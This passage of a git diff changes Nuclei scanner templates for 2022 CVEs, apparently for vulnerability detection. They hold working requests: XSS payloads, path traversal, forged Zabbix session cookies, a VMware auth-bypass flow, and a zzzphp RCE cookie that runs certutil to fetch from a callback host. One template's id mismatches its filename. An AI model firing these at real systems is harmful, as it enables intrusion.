WN533A8 - Cross-Site Scripting (XSS) + author: ritikchaddha + severity: medium + description: | + Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter. + reference: + - https://www.exploit-db.com/exploits/50989 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 + - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing + - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-34048 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"Wavlink" + verified: "true" + tags: cve,cve2022,wavlink,xss,router +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + + newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'x");alert(9);x=("?login=0");' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml new file mode 100644 index 0000000000..d782414f0d --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-35416 +info: + name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS + author: 0x240x23elu + severity: medium + description: | + H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. + reference: + - https://github.com/advisories/GHSA-9x76-78gc-r3m9 + - https://github.com/Docker-droid/H3C_SSL_VPN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-35416 + cwe-id: CWE-79 + metadata: + shodan-query: http.html_hash:510586239 + verified: "true" + tags: cve,cve2022,xss,vpn,h3c +requests: + - raw: + - | + GET /wnm/login/login.json HTTP/1.1 + Host: {{Hostname}} + Cookie: svpnlang= + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-0378.yaml b/nuclei-templates/CVE-2022/cve-2022-0378.yaml new file mode 100644 index 0000000000..f6fecfa17b --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0378.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0378 + +info: + name: Microweber Reflected Cross-Site Scripting + author: pikpikcu + severity: medium + description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 + tags: cve,cve2022,microweber,xss + metadata: + shodan-query: 'http.favicon.hash:780351152' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2022-0378 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'mwui_init' + - 'onmousemove="alert(document.domain)' + condition: and + +# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0482.yaml b/nuclei-templates/CVE-2022/cve-2022-0482.yaml index 1ea0cef27f..652b2cee52 100644 --- a/nuclei-templates/CVE-2022/cve-2022-0482.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-0482.yaml @@ -1,42 +1,30 @@ id: CVE-2022-0482 info: - name: Easy!Appointments <1.4.3 - Broken Access Control + name: Easy!Appointments Broken Access Control author: francescocarlucci,opencirt severity: critical description: | - Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. - impact: | - An attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions. - remediation: | - Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability. + Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3. reference: - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 - https://github.com/alextselegidis/easyappointments - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 - - https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466 + tags: cve,cve2022,easyappointments classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 + cvss-score: 9.10 cve-id: CVE-2022-0482 - cwe-id: CWE-359,CWE-863 - epss-score: 0.04316 - epss-percentile: 0.91494 - cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: easyappointments - product: easyappointments - framework: wordpress - tags: cve,cve2022,easyappointments,huntr,wordpress + cwe-id: CWE-863 -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* + - | POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1 Host: {{Hostname}} @@ -44,24 +32,24 @@ http: csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01 + extractors: + - type: kval + part: header + name: csrf_token + kval: + - "csrfCookie" + internal: true + + cookie-reuse: true matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word part: body words: - '"appointments":' - '"unavailables":' condition: and - - - type: status - status: - - 200 - - extractors: - - type: kval - name: csrf_token - internal: true - kval: - - "csrfCookie" - part: header -# digest: 4a0a0047304502204a46c8ad322e2152ca6650f96039b6f980bed5ddd8cb8cd26ca2fea57efaa24f022100cdd4517ef3e2e11a22c74c4fa7a445447d16471f0c87bab1bae7b6901321c33f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0540.yaml b/nuclei-templates/CVE-2022/cve-2022-0540.yaml deleted file mode 100644 index 477db3d259..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0540.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-0540 - -info: - name: Atlassian Jira Seraph - Authentication Bypass - author: DhiyaneshDK - severity: critical - description: | - Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential disruption of business operations. - remediation: Ensure you are using the latest version and that all security patches have been applied. - reference: - - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 - - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 - - https://jira.atlassian.com/browse/JRASERVER-73650 - - https://jira.atlassian.com/browse/JSDSERVER-11224 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-0540 - cwe-id: CWE-287 - epss-score: 0.2507 - epss-percentile: 0.96565 - cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: jira_data_center - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2022,atlassian,jira,exposure,auth-bypass - -http: - - method: GET - path: - - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' - - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'General Insight Configuration' - - - type: status - status: - - 200 -# digest: 4a0a00473045022100b356f158d98318a855357790576be317b29c040cc4b83e9ce5c9fe54fc6684eb02206bea066d8503896703de749d0cbdc015c9910fb42cc3671fa481e6e72d71ab25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0921.yaml b/nuclei-templates/CVE-2022/cve-2022-0921.yaml new file mode 100644 index 0000000000..5eeef53133 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0921.yaml @@ -0,0 +1,65 @@ +id: CVE-2022-0954 + +info: + name: Microweber <1.2.11 - Stored Cross-Site Scripting + author: amit-jd + severity: medium + description: | + Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability. + reference: + - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 + - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ + - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0954 + cwe-id: CWE-79 + epss-score: 0.00144 + epss-percentile: 0.50222 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: microweber + product: microweber + tags: cve2022,cve,xss,microweber,huntr + +http: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + POST /api/save_option HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother + - | + POST /module/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B + + matchers: + - type: dsl + dsl: + - 'contains(body_2,"true")' + - contains(body_3,'\">\" placeholder=\"Use default') + - 'contains(header_3,"text/html")' + - 'status_code_3==200' + condition: and +# digest: 490a00463044022000cc9a8206ccbc823b71b7d11682af57eb62c7cd6d15308e393af5d9460b13a00220128133adc23ad3f11a14baec1fdfa7049669509da1033a5bb705a1ccb4e4e650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/exploit-CVE-2022-1388.yaml b/nuclei-templates/CVE-2022/cve-2022-1388.yaml similarity index 100% rename from nuclei-templates/Other/exploit-CVE-2022-1388.yaml rename to nuclei-templates/CVE-2022/cve-2022-1388.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-1713.yaml b/nuclei-templates/CVE-2022/cve-2022-1713.yaml deleted file mode 100644 index 047d066d04..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1713.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-1713 - -info: - name: Drawio <18.0.4 - Server-Side Request Forgery - author: pikpikcu - severity: high - description: | - Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. - impact: | - Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage. - remediation: | - Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability. - reference: - - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11 - - https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee - - https://nvd.nist.gov/vuln/detail/CVE-2022-1713 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1713 - cwe-id: CWE-918 - epss-score: 0.0258 - epss-percentile: 0.90003 - cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: diagrams - product: drawio - shodan-query: http.title:"Flowchart Maker" - tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams - -http: - - raw: - - | - GET /proxy?url=http%3a//0:8080/ HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Flowchart Maker & Online Diagram Software" - - - type: word - part: header - words: - - "application/octet-stream" -# digest: 4a0a00473045022070fec57cee168dfa730fadbe57cb5c221f9bbc81767e99ae42cea4202d386420022100b31dbec578fd188d61a9471d303929d0de903cd1f3017691aa45219d9059199a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-21371.yaml b/nuclei-templates/CVE-2022/cve-2022-21371.yaml new file mode 100644 index 0000000000..32db7db2f1 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21371.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-21371 + +info: + name: Oracle WebLogic Server Local File Inclusion + author: paradessia,narluin + severity: high + description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. + reference: + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 + - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2022-21371 + tags: cve,cve2022,lfi,weblogic,oracle + +requests: + - method: GET + raw: + - |+ + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: + - .//WEB-INF/weblogic.xml + - .//WEB-INF/web.xml + + unsafe: true + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body, "")' + - 'contains(body, "")' + condition: or + + - type: dsl + dsl: + - 'contains(all_headers, "text/xml")' + - 'contains(all_headers, "application/xml")' + condition: or + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml new file mode 100644 index 0000000000..578dc0e7cb --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21500.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-21500 + +info: + name: Oracle E-Business Suite <=12.2 - Authentication Bypass + author: 3th1c_yuk1,tess,0xpugazh + severity: high + description: | + Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application. + remediation: | + Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. + reference: + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 + - https://www.oracle.com/security-alerts/cpujul2022.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21500 + epss-score: 0.92631 + epss-percentile: 0.98947 + cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 4 + vendor: oracle + product: e-business_suite + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + tags: cve,cve2022,oracle,misconfig,auth-bypass + +http: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - 'Registration' + - 'Register as individual' + - '' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022077a908cc0f84943d99a897323cdeb2899210c5a6cd3d08634c62ced31283feeb022100a8428c5469152520da4ec621970240d45755a2c602d099e22dce986d12653785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-2290.yaml b/nuclei-templates/CVE-2022/cve-2022-2290.yaml new file mode 100644 index 0000000000..dff0f8b418 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-2290.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-2290 + +info: + name: Trilium <0.52.4 - Cross-Site Scripting + author: dbrwsky + severity: medium + description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance. + remediation: | + Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. + reference: + - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ + - https://github.com/zadam/trilium + - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2290 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-2290 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: trilium_project + product: trilium + shodan-query: title:"Trilium Notes" + tags: cve,cve2022,xss,trilium,huntr,trilium_project + +http: + - method: GET + path: + - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' + - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' + - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "No handler matched for custom " + - "Note '' not found" + condition: or + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 404 +# digest: 4a0a004730450221009f17fcdc98badc0464257c420fab598e7343e41d66382b910b98fd7005d968a0022040758dbc4500b3ca9aaa3096213583ee7175eb34c798a02991e0af55731a6641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-22972.yaml b/nuclei-templates/CVE-2022/cve-2022-22972.yaml new file mode 100644 index 0000000000..2ceac3d1c7 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-22972.yaml @@ -0,0 +1,113 @@ +id: CVE-2022-22972 + +info: + name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass + author: For3stCo1d,princechaddha + severity: critical + description: | + VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. + remediation: | + Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). + reference: + - https://github.com/horizon3ai/CVE-2022-22972 + - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive + - https://www.vmware.com/security/advisories/VMSA-2022-0014.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22972 + cwe-id: CWE-287 + epss-score: 0.7146 + epss-percentile: 0.9778 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: vmware + product: identity_manager + fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + tags: cve2022,cve,vmware,auth-bypass,oast + +http: + - raw: + - | + GET /vcac/ HTTP/1.1 + Host: {{Hostname}} + - | + GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 + Host: {{Hostname}} + - | + POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 + Host: {{interactsh-url}} + Content-type: application/x-www-form-urlencoded + + protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in + + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "HZN=" + + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 302 + + extractors: + - type: regex + name: protected_state + group: 1 + regex: + - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' + internal: true + part: body + + - type: regex + name: horizonRelayState + group: 1 + regex: + - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' + internal: true + part: body + + - type: regex + name: userstore + group: 1 + regex: + - 'id="userstore" value="([a-z.]+)" \/>' + internal: true + part: body + + - type: regex + name: userstoreDisplay + group: 1 + regex: + - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' + internal: true + part: body + + - type: regex + name: stickyConnectorId + group: 1 + regex: + - 'name="stickyConnectorId" value="(.*)"/>' + internal: true + part: body + + - type: kval + name: HZN-Cookie + kval: + - 'HZN' + part: header +# digest: 4a0a0047304502206403cd0d279ad3059877b01e431f357ec5373c9854c2ff5cbe853a8ac65ef39c022100d9069fe039d74cbcad2eb0f8ef4724af0436462068f8baecdb321328ac7a89af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23131.yaml b/nuclei-templates/CVE-2022/cve-2022-23131.yaml deleted file mode 100644 index 53811d3852..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-23131.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2022-23131 - -info: - name: Zabbix - SAML SSO Authentication Bypass - author: For3stCo1d - severity: critical - description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. - remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. - reference: - - https://support.zabbix.com/browse/ZBX-20350 - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://github.com/1mxml/CVE-2022-23131 - metadata: - shodan-query: http.favicon.hash:892542951 - fofa-query: app="ZABBIX-监控系统" && body="saml" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.8 - cve-id: CVE-2022-23131 - tags: cve,cve2022,zabbix,auth-bypass,saml,sso - -requests: - - method: GET - path: - - "{{BaseURL}}/zabbix/index_sso.php" - - "{{BaseURL}}/index_sso.php" - - headers: - Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: dsl - dsl: - - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-23134.yaml b/nuclei-templates/CVE-2022/cve-2022-23134.yaml new file mode 100644 index 0000000000..53aca6a04f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23134.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-23134 + +info: + name: Zabbix Setup Configuration Authentication Bypass + author: bananabr + severity: medium + description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + reference: + - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage + - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-23134 + tags: cve,cve2022,zabbix,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/zabbix/setup.php" + - "{{BaseURL}}/setup.php" + + headers: + Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Database" + - "host" + - "port" + - "Zabbix" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-23347.yaml b/nuclei-templates/CVE-2022/cve-2022-23347.yaml deleted file mode 100644 index 7059ae4b38..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-23347.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-23347 - -info: - name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal - author: 0x_Akoko - severity: high - description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks. - reference: - - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347 - - https://www.cvedetails.com/cve/CVE-2022-23347 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-23347 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"BigAnt" - tags: cve,cve2022,bigant,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/cve-2022-23881.yaml new file mode 100644 index 0000000000..84b802eba2 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23881.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-23881 + +info: + name: zzzphp v2.1.0 RCE + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + tags: cve,cve2022,rce,zzzphp,zzzcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + +requests: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 diff --git a/nuclei-templates/CVE-2022/cve-2022-24124.yaml b/nuclei-templates/CVE-2022/cve-2022-24124.yaml new file mode 100644 index 0000000000..f940ce92b6 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24124.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-24124 + +info: + name: Casdoor 1.13.0 - Unauthenticated SQL Injection + author: cckuailong + severity: high + 